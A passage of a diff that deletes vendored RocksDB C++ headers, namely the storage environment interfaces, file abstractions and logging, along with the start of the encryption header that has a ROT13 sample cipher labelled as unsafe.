-  // REQUIRES: lock was returned by a successful LockFile() call
-  // REQUIRES: lock has not already been unlocked.
-  virtual Status UnlockFile(FileLock* lock) = 0;
-
-  // Priority for scheduling job in thread pool
-  enum Priority { BOTTOM, LOW, HIGH, TOTAL };
-
-  // Priority for requesting bytes in rate limiter scheduler
-  enum IOPriority {
-    IO_LOW = 0,
-    IO_HIGH = 1,
-    IO_TOTAL = 2
-  };
-
-  // Arrange to run "(*function)(arg)" once in a background thread, in
-  // the thread pool specified by pri. By default, jobs go to the 'LOW'
-  // priority thread pool.
-
-  // "function" may run in an unspecified thread.  Multiple functions
-  // added to the same Env may run concurrently in different threads.
-  // I.e., the caller may not assume that background work items are
-  // serialized.
-  // When the UnSchedule function is called, the unschedFunction
-  // registered at the time of Schedule is invoked with arg as a parameter.
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) = 0;
-
-  // Arrange to remove jobs for given arg from the queue_ if they are not
-  // already scheduled. Caller is expected to have exclusive lock on arg.
-  virtual int UnSchedule(void* arg, Priority pri) { return 0; }
-
-  // Start a new thread, invoking "function(arg)" within the new thread.
-  // When "function(arg)" returns, the thread will be destroyed.
-  virtual void StartThread(void (*function)(void* arg), void* arg) = 0;
-
-  // Wait for all threads started by StartThread to terminate.
-  virtual void WaitForJoin() {}
-
-  // Get thread pool queue length for specific thread pool.
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const {
-    return 0;
-  }
-
-  // *path is set to a temporary directory that can be used for testing. It may
-  // or many not have just been created. The directory may or may not differ
-  // between runs of the same process, but subsequent calls will return the
-  // same directory.
-  virtual Status GetTestDirectory(std::string* path) = 0;
-
-  // Create and return a log file for storing informational messages.
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) = 0;
-
-  // Returns the number of micro-seconds since some fixed point in time.
-  // It is often used as system time such as in GenericRateLimiter
-  // and other places so a port needs to return system time in order to work.
-  virtual uint64_t NowMicros() = 0;
-
-  // Returns the number of nano-seconds since some fixed point in time. Only
-  // useful for computing deltas of time in one run.
-  // Default implementation simply relies on NowMicros.
-  // In platform-specific implementations, NowNanos() should return time points
-  // that are MONOTONIC.
-  virtual uint64_t NowNanos() {
-    return NowMicros() * 1000;
-  }
-
-  // Sleep/delay the thread for the perscribed number of micro-seconds.
-  virtual void SleepForMicroseconds(int micros) = 0;
-
-  // Get the current host name.
-  virtual Status GetHostName(char* name, uint64_t len) = 0;
-
-  // Get the number of seconds since the Epoch, 1970-01-01 00:00:00 (UTC).
-  // Only overwrites *unix_time on success.
-  virtual Status GetCurrentTime(int64_t* unix_time) = 0;
-
-  // Get full directory name for this db.
-  virtual Status GetAbsolutePath(const std::string& db_path,
-      std::string* output_path) = 0;
-
-  // The number of background worker threads of a specific thread pool
-  // for this environment. 'LOW' is the default pool.
-  // default number: 1
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) = 0;
-  virtual int GetBackgroundThreads(Priority pri = LOW) = 0;
-
-  // Enlarge number of background worker threads of a specific thread pool
-  // for this environment if it is smaller than specified. 'LOW' is the default
-  // pool.
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0;
-
-  // Lower IO priority for threads from the specified pool.
-  virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {}
-
-  // Converts seconds-since-Jan-01-1970 to a printable string
-  virtual std::string TimeToString(uint64_t time) = 0;
-
-  // Generates a unique id that can be used to identify a db
-  virtual std::string GenerateUniqueId();
-
-  // OptimizeForLogWrite will create a new EnvOptions object that is a copy of
-  // the EnvOptions in the parameters, but is optimized for reading log files.
-  virtual EnvOptions OptimizeForLogRead(const EnvOptions& env_options) const;
-
-  // OptimizeForManifestRead will create a new EnvOptions object that is a copy
-  // of the EnvOptions in the parameters, but is optimized for reading manifest
-  // files.
-  virtual EnvOptions OptimizeForManifestRead(
-      const EnvOptions& env_options) const;
-
-  // OptimizeForLogWrite will create a new EnvOptions object that is a copy of
-  // the EnvOptions in the parameters, but is optimized for writing log files.
-  // Default implementation returns the copy of the same object.
-  virtual EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-                                         const DBOptions& db_options) const;
-  // OptimizeForManifestWrite will create a new EnvOptions object that is a copy
-  // of the EnvOptions in the parameters, but is optimized for writing manifest
-  // files. Default implementation returns the copy of the same object.
-  virtual EnvOptions OptimizeForManifestWrite(
-      const EnvOptions& env_options) const;
-
-  // OptimizeForCompactionTableWrite will create a new EnvOptions object that is
-  // a copy of the EnvOptions in the parameters, but is optimized for writing
-  // table files.
-  virtual EnvOptions OptimizeForCompactionTableWrite(
-      const EnvOptions& env_options,
-      const ImmutableDBOptions& db_options) const;
-
-  // OptimizeForCompactionTableWrite will create a new EnvOptions object that
-  // is a copy of the EnvOptions in the parameters, but is optimized for reading
-  // table files.
-  virtual EnvOptions OptimizeForCompactionTableRead(
-      const EnvOptions& env_options,
-      const ImmutableDBOptions& db_options) const;
-
-  // Returns the status of all threads that belong to the current Env.
-  virtual Status GetThreadList(std::vector<ThreadStatus>* thread_list) {
-    return Status::NotSupported("Not supported.");
-  }
-
-  // Returns the pointer to ThreadStatusUpdater.  This function will be
-  // used in RocksDB internally to update thread status and supports
-  // GetThreadList().
-  virtual ThreadStatusUpdater* GetThreadStatusUpdater() const {
-    return thread_status_updater_;
-  }
-
-  // Returns the ID of the current thread.
-  virtual uint64_t GetThreadID() const;
-
- protected:
-  // The pointer to an internal structure that will update the
-  // status of each thread.
-  ThreadStatusUpdater* thread_status_updater_;
-
- private:
-  // No copying allowed
-  Env(const Env&);
-  void operator=(const Env&);
-};
-
-// The factory function to construct a ThreadStatusUpdater.  Any Env
-// that supports GetThreadList() feature should call this function in its
-// constructor to initialize thread_status_updater_.
-ThreadStatusUpdater* CreateThreadStatusUpdater();
-
-// A file abstraction for reading sequentially through a file
-class SequentialFile {
- public:
-  SequentialFile() { }
-  virtual ~SequentialFile();
-
-  // Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-  // written by this routine.  Sets "*result" to the data that was
-  // read (including if fewer than "n" bytes were successfully read).
-  // May set "*result" to point at data in "scratch[0..n-1]", so
-  // "scratch[0..n-1]" must be live when "*result" is used.
-  // If an error was encountered, returns a non-OK status.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Read(size_t n, Slice* result, char* scratch) = 0;
-
-  // Skip "n" bytes from the file. This is guaranteed to be no
-  // slower that reading the same data, but may be faster.
-  //
-  // If end of file is reached, skipping will stop at the end of the
-  // file, and Skip will return OK.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Skip(uint64_t n) = 0;
-
-  // Indicates the upper layers if the current SequentialFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-
-  // Positioned Read for direct I/O
-  // If Direct I/O enabled, offset, n, and scratch should be properly aligned
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-                                char* scratch) {
-    return Status::NotSupported();
-  }
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class RandomAccessFile {
- public:
-
-  RandomAccessFile() { }
-  virtual ~RandomAccessFile();
-
-  // Read up to "n" bytes from the file starting at "offset".
-  // "scratch[0..n-1]" may be written by this routine.  Sets "*result"
-  // to the data that was read (including if fewer than "n" bytes were
-  // successfully read).  May set "*result" to point at data in
-  // "scratch[0..n-1]", so "scratch[0..n-1]" must be live when
-  // "*result" is used.  If an error was encountered, returns a non-OK
-  // status.
-  //
-  // Safe for concurrent use by multiple threads.
-  // If Direct I/O enabled, offset, n, and scratch should be aligned properly.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const = 0;
-
-  // Readahead the file starting from offset by n bytes for caching.
-  virtual Status Prefetch(uint64_t offset, size_t n) {
-    return Status::OK();
-  }
-
-  // Tries to get an unique ID for this file that will be the same each time
-  // the file is opened (and will stay the same while the file is open).
-  // Furthermore, it tries to make this ID at most "max_size" bytes. If such an
-  // ID can be created this function returns the length of the ID and places it
-  // in "id"; otherwise, this function returns 0, in which case "id"
-  // may not have been modified.
-  //
-  // This function guarantees, for IDs from a given environment, two unique ids
-  // cannot be made equal to each other by adding arbitrary bytes to one of
-  // them. That is, no unique ID is the prefix of another.
-  //
-  // This function guarantees that the returned ID will not be interpretable as
-  // a single varint.
-  //
-  // Note: these IDs are only valid for the duration of the process.
-  virtual size_t GetUniqueId(char* id, size_t max_size) const {
-    return 0; // Default implementation to prevent issues with backwards
-              // compatibility.
-  };
-
-  enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED };
-
-  virtual void Hint(AccessPattern pattern) {}
-
-  // Indicates the upper layers if the current RandomAccessFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-};
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class WritableFile {
- public:
-  WritableFile()
-    : last_preallocated_block_(0),
-      preallocation_block_size_(0),
-      io_priority_(Env::IO_TOTAL) {
-  }
-  virtual ~WritableFile();
-
-  // Append data to the end of the file
-  // Note: A WriteabelFile object must support either Append or
-  // PositionedAppend, so the users cannot mix the two.
-  virtual Status Append(const Slice& data) = 0;
-
-  // PositionedAppend data to the specified offset. The new EOF after append
-  // must be larger than the previous EOF. This is to be used when writes are
-  // not backed by OS buffers and hence has to always start from the start of
-  // the sector. The implementation thus needs to also rewrite the last
-  // partial sector.
-  // Note: PositionAppend does not guarantee moving the file offset after the
-  // write. A WritableFile object must support either Append or
-  // PositionedAppend, so the users cannot mix the two.
-  //
-  // PositionedAppend() can only happen on the page/sector boundaries. For that
-  // reason, if the last write was an incomplete sector we still need to rewind
-  // back to the nearest sector/page and rewrite the portion of it with whatever
-  // we need to add. We need to keep where we stop writing.
-  //
-  // PositionedAppend() can only write whole sectors. For that reason we have to
-  // pad with zeros for the last write and trim the file when closing according
-  // to the position we keep in the previous step.
-  //
-  // PositionedAppend() requires aligned buffer to be passed in. The alignment
-  // required is queried via GetRequiredBufferAlignment()
-  virtual Status PositionedAppend(const Slice& /* data */, uint64_t /* offset */) {
-    return Status::NotSupported();
-  }
-
-  // Truncate is necessary to trim the file to the correct size
-  // before closing. It is not always possible to keep track of the file
-  // size due to whole pages writes. The behavior is undefined if called
-  // with other writes to follow.
-  virtual Status Truncate(uint64_t size) {
-    return Status::OK();
-  }
-  virtual Status Close() = 0;
-  virtual Status Flush() = 0;
-  virtual Status Sync() = 0; // sync data
-
-  /*
-   * Sync data and/or metadata as well.
-   * By default, sync only data.
-   * Override this method for environments where we need to sync
-   * metadata as well.
-   */
-  virtual Status Fsync() {
-    return Sync();
-  }
-
-  // true if Sync() and Fsync() are safe to call concurrently with Append()
-  // and Flush().
-  virtual bool IsSyncThreadSafe() const {
-    return false;
-  }
-
-  // Indicates the upper layers if the current WritableFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-  /*
-   * Change the priority in rate limiter if rate limiting is enabled.
-   * If rate limiting is not enabled, this call has no effect.
-   */
-  virtual void SetIOPriority(Env::IOPriority pri) {
-    io_priority_ = pri;
-  }
-
-  virtual Env::IOPriority GetIOPriority() { return io_priority_; }
-
-  /*
-   * Get the size of valid data in the file.
-   */
-  virtual uint64_t GetFileSize() {
-    return 0;
-  }
-
-  /*
-   * Get and set the default pre-allocation block size for writes to
-   * this file.  If non-zero, then Allocate will be used to extend the
-   * underlying storage of a file (generally via fallocate) if the Env
-   * instance supports it.
-   */
-  virtual void SetPreallocationBlockSize(size_t size) {
-    preallocation_block_size_ = size;
-  }
-
-  virtual void GetPreallocationStatus(size_t* block_size,
-                                      size_t* last_allocated_block) {
-    *last_allocated_block = last_preallocated_block_;
-    *block_size = preallocation_block_size_;
-  }
-
-  // For documentation, refer to RandomAccessFile::GetUniqueId()
-  virtual size_t GetUniqueId(char* id, size_t max_size) const {
-    return 0; // Default implementation to prevent issues with backwards
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  // This call has no effect on dirty pages in the cache.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-
-  // Sync a file range with disk.
-  // offset is the starting byte of the file range to be synchronized.
-  // nbytes specifies the length of the range to be synchronized.
-  // This asks the OS to initiate flushing the cached data to disk,
-  // without waiting for completion.
-  // Default implementation does nothing.
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); }
-
-  // PrepareWrite performs any necessary preparation for a write
-  // before the write actually occurs.  This allows for pre-allocation
-  // of space on devices where it can result in less file
-  // fragmentation and/or less waste from over-zealous filesystem
-  // pre-allocation.
-  virtual void PrepareWrite(size_t offset, size_t len) {
-    if (preallocation_block_size_ == 0) {
-      return;
-    }
-    // If this write would cross one or more preallocation blocks,
-    // determine what the last preallocation block necessary to
-    // cover this write would be and Allocate to that point.
-    const auto block_size = preallocation_block_size_;
-    size_t new_last_preallocated_block =
-      (offset + len + block_size - 1) / block_size;
-    if (new_last_preallocated_block > last_preallocated_block_) {
-      size_t num_spanned_blocks =
-        new_last_preallocated_block - last_preallocated_block_;
-      Allocate(block_size * last_preallocated_block_,
-               block_size * num_spanned_blocks);
-      last_preallocated_block_ = new_last_preallocated_block;
-    }
-  }
-
-  // Pre-allocates space for a file.
-  virtual Status Allocate(uint64_t offset, uint64_t len) {
-    return Status::OK();
-  }
-
- protected:
-  size_t preallocation_block_size() { return preallocation_block_size_; }
-
- private:
-  size_t last_preallocated_block_;
-  size_t preallocation_block_size_;
-  // No copying allowed
-  WritableFile(const WritableFile&);
-  void operator=(const WritableFile&);
-
- protected:
-  friend class WritableFileWrapper;
-  friend class WritableFileMirror;
-
-  Env::IOPriority io_priority_;
-};
-
-// A file abstraction for random reading and writing.
-class RandomRWFile {
- public:
-  RandomRWFile() {}
-  virtual ~RandomRWFile() {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) = 0;
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const = 0;
-
-  virtual Status Flush() = 0;
-
-  virtual Status Sync() = 0;
-
-  virtual Status Fsync() { return Sync(); }
-
-  virtual Status Close() = 0;
-
-  // No copying allowed
-  RandomRWFile(const RandomRWFile&) = delete;
-  RandomRWFile& operator=(const RandomRWFile&) = delete;
-};
-
-// Directory object represents collection of files and implements
-// filesystem operations that can be executed on directories.
-class Directory {
- public:
-  virtual ~Directory() {}
-  // Fsync directory. Can be called concurrently from multiple threads.
-  virtual Status Fsync() = 0;
-};
-
-enum InfoLogLevel : unsigned char {
-  DEBUG_LEVEL = 0,
-  INFO_LEVEL,
-  WARN_LEVEL,
-  ERROR_LEVEL,
-  FATAL_LEVEL,
-  HEADER_LEVEL,
-  NUM_INFO_LOG_LEVELS,
-};
-
-// An interface for writing log messages.
-class Logger {
- public:
-  size_t kDoNotSupportGetLogFileSize = (std::numeric_limits<size_t>::max)();
-
-  explicit Logger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : log_level_(log_level) {}
-  virtual ~Logger();
-
-  // Write a header to the log file with the specified format
-  // It is recommended that you log all header information at the start of the
-  // application. But it is not enforced.
-  virtual void LogHeader(const char* format, va_list ap) {
-    // Default implementation does a simple INFO level log write.
-    // Please override as per the logger class requirement.
-    Logv(format, ap);
-  }
-
-  // Write an entry to the log file with the specified format.
-  virtual void Logv(const char* format, va_list ap) = 0;
-
-  // Write an entry to the log file with the specified log level
-  // and format.  Any log with level under the internal log level
-  // of *this (see @SetInfoLogLevel and @GetInfoLogLevel) will not be
-  // printed.
-  virtual void Logv(const InfoLogLevel log_level, const char* format, va_list ap);
-
-  virtual size_t GetLogFileSize() const { return kDoNotSupportGetLogFileSize; }
-  // Flush to the OS buffers
-  virtual void Flush() {}
-  virtual InfoLogLevel GetInfoLogLevel() const { return log_level_; }
-  virtual void SetInfoLogLevel(const InfoLogLevel log_level) {
-    log_level_ = log_level;
-  }
-
- private:
-  // No copying allowed
-  Logger(const Logger&);
-  void operator=(const Logger&);
-  InfoLogLevel log_level_;
-};
-
-
-// Identifies a locked file.
-class FileLock {
- public:
-  FileLock() { }
-  virtual ~FileLock();
- private:
-  // No copying allowed
-  FileLock(const FileLock&);
-  void operator=(const FileLock&);
-};
-
-extern void LogFlush(const shared_ptr<Logger>& info_log);
-
-extern void Log(const InfoLogLevel log_level,
-                const shared_ptr<Logger>& info_log, const char* format, ...);
-
-// a set of log functions with different log levels.
-extern void Header(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Debug(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Info(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Warn(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Error(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Fatal(const shared_ptr<Logger>& info_log, const char* format, ...);
-
-// Log the specified data to *info_log if info_log is non-nullptr.
-// The default info log level is InfoLogLevel::INFO_LEVEL.
-extern void Log(const shared_ptr<Logger>& info_log, const char* format, ...)
-#   if defined(__GNUC__) || defined(__clang__)
-    __attribute__((__format__ (__printf__, 2, 3)))
-#   endif
-    ;
-
-extern void LogFlush(Logger *info_log);
-
-extern void Log(const InfoLogLevel log_level, Logger* info_log,
-                const char* format, ...);
-
-// The default info log level is InfoLogLevel::INFO_LEVEL.
-extern void Log(Logger* info_log, const char* format, ...)
-#   if defined(__GNUC__) || defined(__clang__)
-    __attribute__((__format__ (__printf__, 2, 3)))
-#   endif
-    ;
-
-// a set of log functions with different log levels.
-extern void Header(Logger* info_log, const char* format, ...);
-extern void Debug(Logger* info_log, const char* format, ...);
-extern void Info(Logger* info_log, const char* format, ...);
-extern void Warn(Logger* info_log, const char* format, ...);
-extern void Error(Logger* info_log, const char* format, ...);
-extern void Fatal(Logger* info_log, const char* format, ...);
-
-// A utility routine: write "data" to the named file.
-extern Status WriteStringToFile(Env* env, const Slice& data,
-                                const std::string& fname,
-                                bool should_sync = false);
-
-// A utility routine: read contents of named file into *data
-extern Status ReadFileToString(Env* env, const std::string& fname,
-                               std::string* data);
-
-// An implementation of Env that forwards all calls to another Env.
-// May be useful to clients who wish to override just part of the
-// functionality of another Env.
-class EnvWrapper : public Env {
- public:
-  // Initialize an EnvWrapper that delegates all calls to *t
-  explicit EnvWrapper(Env* t) : target_(t) { }
-  ~EnvWrapper() override;
-
-  // Return the target to which this Env forwards all calls
-  Env* target() const { return target_; }
-
-  // The following text is boilerplate that forwards all methods to target()
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    return target_->NewSequentialFile(f, r, options);
-  }
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override {
-    return target_->NewRandomAccessFile(f, r, options);
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    return target_->NewWritableFile(f, r, options);
-  }
-  Status ReopenWritableFile(const std::string& fname,
-                            unique_ptr<WritableFile>* result,
-                            const EnvOptions& options) override {
-    return target_->ReopenWritableFile(fname, result, options);
-  }
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           unique_ptr<WritableFile>* r,
-                           const EnvOptions& options) override {
-    return target_->ReuseWritableFile(fname, old_fname, r, options);
-  }
-  Status NewRandomRWFile(const std::string& fname,
-                         unique_ptr<RandomRWFile>* result,
-                         const EnvOptions& options) override {
-    return target_->NewRandomRWFile(fname, result, options);
-  }
-  Status NewDirectory(const std::string& name,
-                      unique_ptr<Directory>* result) override {
-    return target_->NewDirectory(name, result);
-  }
-  Status FileExists(const std::string& f) override {
-    return target_->FileExists(f);
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    return target_->GetChildren(dir, r);
-  }
-  Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    return target_->GetChildrenFileAttributes(dir, result);
-  }
-  Status DeleteFile(const std::string& f) override {
-    return target_->DeleteFile(f);
-  }
-  Status CreateDir(const std::string& d) override {
-    return target_->CreateDir(d);
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    return target_->CreateDirIfMissing(d);
-  }
-  Status DeleteDir(const std::string& d) override {
-    return target_->DeleteDir(d);
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    return target_->GetFileSize(f, s);
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    return target_->GetFileModificationTime(fname, file_mtime);
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    return target_->RenameFile(s, t);
-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    return target_->LinkFile(s, t);
-  }
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    return target_->LockFile(f, l);
-  }
-
-  Status UnlockFile(FileLock* l) override { return target_->UnlockFile(l); }
-
-  void Schedule(void (*f)(void* arg), void* a, Priority pri,
-                void* tag = nullptr, void (*u)(void* arg) = 0) override {
-    return target_->Schedule(f, a, pri, tag, u);
-  }
-
-  int UnSchedule(void* tag, Priority pri) override {
-    return target_->UnSchedule(tag, pri);
-  }
-
-  void StartThread(void (*f)(void*), void* a) override {
-    return target_->StartThread(f, a);
-  }
-  void WaitForJoin() override { return target_->WaitForJoin(); }
-  unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const override {
-    return target_->GetThreadPoolQueueLen(pri);
-  }
-  Status GetTestDirectory(std::string* path) override {
-    return target_->GetTestDirectory(path);
-  }
-  Status NewLogger(const std::string& fname,
-                   shared_ptr<Logger>* result) override {
-    return target_->NewLogger(fname, result);
-  }
-  uint64_t NowMicros() override { return target_->NowMicros(); }
-
-  void SleepForMicroseconds(int micros) override {
-    target_->SleepForMicroseconds(micros);
-  }
-  Status GetHostName(char* name, uint64_t len) override {
-    return target_->GetHostName(name, len);
-  }
-  Status GetCurrentTime(int64_t* unix_time) override {
-    return target_->GetCurrentTime(unix_time);
-  }
-  Status GetAbsolutePath(const std::string& db_path,
-                         std::string* output_path) override {
-    return target_->GetAbsolutePath(db_path, output_path);
-  }
-  void SetBackgroundThreads(int num, Priority pri) override {
-    return target_->SetBackgroundThreads(num, pri);
-  }
-  int GetBackgroundThreads(Priority pri) override {
-    return target_->GetBackgroundThreads(pri);
-  }
-
-  void IncBackgroundThreadsIfNeeded(int num, Priority pri) override {
-    return target_->IncBackgroundThreadsIfNeeded(num, pri);
-  }
-
-  void LowerThreadPoolIOPriority(Priority pool = LOW) override {
-    target_->LowerThreadPoolIOPriority(pool);
-  }
-
-  std::string TimeToString(uint64_t time) override {
-    return target_->TimeToString(time);
-  }
-
-  Status GetThreadList(std::vector<ThreadStatus>* thread_list) override {
-    return target_->GetThreadList(thread_list);
-  }
-
-  ThreadStatusUpdater* GetThreadStatusUpdater() const override {
-    return target_->GetThreadStatusUpdater();
-  }
-
-  uint64_t GetThreadID() const override {
-    return target_->GetThreadID();
-  }
-
-  std::string GenerateUniqueId() override {
-    return target_->GenerateUniqueId();
-  }
-
- private:
-  Env* target_;
-};
-
-// An implementation of WritableFile that forwards all calls to another
-// WritableFile. May be useful to clients who wish to override just part of the
-// functionality of another WritableFile.
-// It's declared as friend of WritableFile to allow forwarding calls to
-// protected virtual methods.
-class WritableFileWrapper : public WritableFile {
- public:
-  explicit WritableFileWrapper(WritableFile* t) : target_(t) { }
-
-  Status Append(const Slice& data) override { return target_->Append(data); }
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    return target_->PositionedAppend(data, offset);
-  }
-  Status Truncate(uint64_t size) override { return target_->Truncate(size); }
-  Status Close() override { return target_->Close(); }
-  Status Flush() override { return target_->Flush(); }
-  Status Sync() override { return target_->Sync(); }
-  Status Fsync() override { return target_->Fsync(); }
-  bool IsSyncThreadSafe() const override { return target_->IsSyncThreadSafe(); }
-  void SetIOPriority(Env::IOPriority pri) override {
-    target_->SetIOPriority(pri);
-  }
-  Env::IOPriority GetIOPriority() override { return target_->GetIOPriority(); }
-  uint64_t GetFileSize() override { return target_->GetFileSize(); }
-  void GetPreallocationStatus(size_t* block_size,
-                              size_t* last_allocated_block) override {
-    target_->GetPreallocationStatus(block_size, last_allocated_block);
-  }
-  size_t GetUniqueId(char* id, size_t max_size) const override {
-    return target_->GetUniqueId(id, max_size);
-  }
-  Status InvalidateCache(size_t offset, size_t length) override {
-    return target_->InvalidateCache(offset, length);
-  }
-
-  void SetPreallocationBlockSize(size_t size) override {
-    target_->SetPreallocationBlockSize(size);
-  }
-  void PrepareWrite(size_t offset, size_t len) override {
-    target_->PrepareWrite(offset, len);
-  }
-
- protected:
-  Status Allocate(uint64_t offset, uint64_t len) override {
-    return target_->Allocate(offset, len);
-  }
-  Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-    return target_->RangeSync(offset, nbytes);
-  }
-
- private:
-  WritableFile* target_;
-};
-
-// Returns a new environment that stores its data in memory and delegates
-// all non-file-storage tasks to base_env. The caller must delete the result
-// when it is no longer needed.
-// *base_env must remain live while the result is in use.
-Env* NewMemEnv(Env* base_env);
-
-// Returns a new environment that is used for HDFS environment.
-// This is a factory method for HdfsEnv declared in hdfs/env_hdfs.h
-Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname);
-
-// Returns a new environment that measures function call times for filesystem
-// operations, reporting results to variables in PerfContext.
-// This is a factory method for TimedEnv defined in utilities/env_timed.cc.
-Env* NewTimedEnv(Env* base_env);
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_ENV_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/env_encryption.h b/thirdparty/rocksdb/include/rocksdb/env_encryption.h
deleted file mode 100644
index e4c924a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/env_encryption.h
+++ /dev/null
@@ -1,196 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if !defined(ROCKSDB_LITE) 
-
-#include <string>
-
-#include "env.h"
-
-namespace rocksdb {
-
-class EncryptionProvider;
-
-// Returns an Env that encrypts data when stored on disk and decrypts data when 
-// read from disk.
-Env* NewEncryptedEnv(Env* base_env, EncryptionProvider* provider);
-
-// BlockAccessCipherStream is the base class for any cipher stream that 
-// supports random access at block level (without requiring data from other blocks).
-// E.g. CTR (Counter operation mode) supports this requirement.
-class BlockAccessCipherStream {
-    public:
-      virtual ~BlockAccessCipherStream() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() = 0;
-
-      // Encrypt one or more (partial) blocks of data at the file offset.
-      // Length of data is given in dataSize.
-      virtual Status Encrypt(uint64_t fileOffset, char *data, size_t dataSize);
-
-      // Decrypt one or more (partial) blocks of data at the file offset.
-      // Length of data is given in dataSize.
-      virtual Status Decrypt(uint64_t fileOffset, char *data, size_t dataSize);
-
-    protected:
-      // Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-      virtual void AllocateScratch(std::string&) = 0;
-
-      // Encrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status EncryptBlock(uint64_t blockIndex, char *data, char* scratch) = 0;
-
-      // Decrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status DecryptBlock(uint64_t blockIndex, char *data, char* scratch) = 0;
-};
-
-// BlockCipher 
-class BlockCipher {
-    public:
-      virtual ~BlockCipher() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() = 0;
-
-      // Encrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Encrypt(char *data) = 0;
-
-      // Decrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Decrypt(char *data) = 0;
-};
-
-// Implements a BlockCipher using ROT13.
-//
-// Note: This is a sample implementation of BlockCipher, 
-// it is NOT considered safe and should NOT be used in production.
-class ROT13BlockCipher : public BlockCipher {
-    private: 
-      size_t blockSize_;
-    public:
